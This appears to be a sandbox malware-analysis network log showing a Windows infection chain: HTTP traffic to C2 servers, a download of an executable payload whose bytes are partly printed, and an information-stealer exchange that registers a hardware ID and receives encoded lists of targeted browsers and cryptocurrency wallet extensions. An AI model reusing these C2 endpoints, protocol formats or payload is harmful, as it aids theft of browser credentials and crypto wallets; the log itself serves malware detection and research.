                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.544326067 CET1236INData Raw: 1d 1c 14 4d 00 0f 84 8d fd 03 00 85 f6 0f 88 a5 fd 03 00 8b 4d 0c e8 f3 33 00 00 8d 4e 01 8b f8 51 6a 01 57 e8 4a 3a 00 00 83 c4 0c 89 75 e0 33 c0 89 5d e8 40 89 45 ec 53 50 8d 45 e0 50 57 e8 8f 40 00 00 83 c4 10 8d 4d e0 e8 74 9f 00 00 85 f6 7e
                                                                                                                                                                                                                                                            Data Ascii: MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MKEPM#;|M"hM+M@_^[U;Q}BAM;t4!x]MhI:2VWw7'
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:12.662051916 CET1236INData Raw: b8 23 4d 00 44 c9 49 00 89 1d bc 23 4d 00 89 1d c0 23 4d 00 89 1d c4 23 4d 00 a3 c8 23 4d 00 89 1d cc 23 4d 00 89 1d d0 23 4d 00 89 1d d4 23 4d 00 89 1d dc 23 4d 00 c7 05 e0 23 4d 00 3c c9 49 00 89 1d e4 23 4d 00 89 1d e8 23 4d 00 89 1d ec 23 4d
                                                                                                                                                                                                                                                            Data Ascii: #MDI#M#M#M#M#M#M#M#M#M<I#M#M#M#MfNtL$(>T$(0h(IL$,D$(#MPL$tL$mqD$3PjVhIhIL$cL$(c_^#M[]UVWM


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            19192.168.2.449851185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:18.044378042 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019672001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:19.354304075 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:19 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            20192.168.2.449857185.215.113.16801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:19.585907936 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.904764891 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:20 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 2752512
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 21:04:23 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "67672d57-2a0000"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 11 76 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ *v*`Ui`D @ @ @.rsrcD``@.idata f@zrghudyy)p)h@fscodnir *)@.taggant@@*")@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.904860020 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.904900074 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.905395031 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.905421972 CET896INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.905438900 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.906044006 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.906060934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: 1fO+y]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.906076908 CET1236INData Raw: e4 b9 e0 a8 3c 97 ca 92 1a 54 d8 92 1a 97 e4 92 1a 97 e4 92 1a 05 e5 92 1a 05 e5 92 1a 92 e4 92 1a 83 e4 92 19 79 e2 aa f9 97 e4 84 c0 55 13 47 a7 94 e4 8d 1a 97 e4 92 1a 8b e4 92 1a 21 30 a3 ca 69 33 5d d6 64 3d 8d 1a 97 e4 89 1a 2b e4 92 1a fb
                                                                                                                                                                                                                                                            Data Ascii: <TyUG!0i3]d=+rf_r,vjWor~/r/xSr"a5>9tRqt`
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:20.906881094 CET1236INData Raw: 19 c4 eb 17 18 73 e4 2e c7 97 e4 92 1a 04 e4 bc e1 25 e5 ab 1a 33 c0 92 1a 97 e4 08 f1 ee ea 88 1a 6e e4 92 fa 97 e4 92 1a 97 e4 8d 1a 66 e1 92 1a 95 e4 63 ef 95 e4 8f 1a 72 e1 92 1a 94 e4 51 e4 97 e4 8d 1a 9d ed 92 1a 94 e4 57 e5 97 e4 8c 1a 22
                                                                                                                                                                                                                                                            Data Ascii: s.%3nfcrQW"p-:N(]<VY
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:21.024625063 CET1236INData Raw: a5 36 12 44 a2 4f 10 7e ba 45 21 7c b4 4c 12 48 a5 97 13 4e ba 48 25 43 d8 4e 21 7f ba 52 12 48 d8 43 21 72 b6 50 12 7b a0 52 21 8d b7 52 07 40 d8 49 25 4a a4 45 07 48 ab 40 29 48 b7 54 10 48 ba 42 21 7f b3 4c 23 48 19 4f 25 7f a5 3e 25 7f a4 47
                                                                                                                                                                                                                                                            Data Ascii: 6DO~E!|LHNH%CN!RHC!rP{R!R@I%JEH@)HTHB!L#HO%>%GBL(HO%CPBE%@O%CPBDI#EI/HB!L#HIrO%CP@C"DS!CU(HI!yLILLK!P{R!rEB6HPHB!L#HPEDILB!F+H6 xK-NC!P{R!rI


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            21192.168.2.449863185.215.113.206806672C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:22.387418985 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:23.731206894 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:23 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:23.767143965 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 211
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 42 37 35 41 45 30 31 32 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="hwid"19B75AE0124F4033060071------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="build"stok------HIDAFHDHCBGDGCBGCGII--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.226443052 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:23 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 180
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 4d 47 56 69 4e 7a 49 33 4d 44 64 6b 4e 47 45 33 5a 6a 55 35 4f 54 6b 7a 59 54 45 33 4f 44 52 6b 5a 47 55 32 4e 47 4d 34 5a 6a 42 6a 4e 6a 63 35 5a 6d 4d 32 4f 44 49 77 4e 54 41 78 4d 47 49 78 4d 7a 49 33 4e 54 45 34 59 7a 4d 30 4d 54 4d 33 5a 44 67 30 59 7a 45 33 4f 54 67 33 5a 44 46 6b 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                            Data Ascii: MGViNzI3MDdkNGE3ZjU5OTkzYTE3ODRkZGU2NGM4ZjBjNjc5ZmM2ODIwNTAxMGIxMzI3NTE4YzM0MTM3ZDg0YzE3OTg3ZDFkfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.266505957 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="message"browsers------IEBAAFCAFCBKFHJJJKKF--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.720753908 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:24 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 2028
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.720863104 CET1020INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                            Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:24.748295069 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="message"plugins------HIDAFHDHCBGDGCBGCGII--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.196274042 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:24 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 7116
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:25.196433067 CET124INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                            Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
